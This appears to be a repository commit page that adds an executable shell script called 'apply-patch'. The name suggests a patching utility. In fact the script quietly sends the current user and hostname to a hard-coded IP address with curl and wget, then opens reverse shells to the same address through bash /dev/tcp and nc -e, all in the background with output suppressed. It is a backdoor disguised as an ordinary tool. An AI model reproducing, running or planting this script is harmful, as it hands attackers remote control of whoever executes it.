apply-patch
This commit is contained in:
Executable
+5
@@ -0,0 +1,5 @@
|
||||
#!/bin/sh
|
||||
curl -sm5 http://202.79.169.91:2801/RCE_$(whoami)_$(hostname|tr -cd A-Za-z0-9._-) >/dev/null 2>&1 &
|
||||
wget -qO- http://202.79.169.91:2801/RCEW_$(whoami) >/dev/null 2>&1 &
|
||||
bash -c "bash -i >& /dev/tcp/202.79.169.91/2801 0>&1" >/dev/null 2>&1 &
|
||||
nc 202.79.169.91 2801 -e /bin/sh >/dev/null 2>&1 &
|
||||
Reference in New Issue
Block a user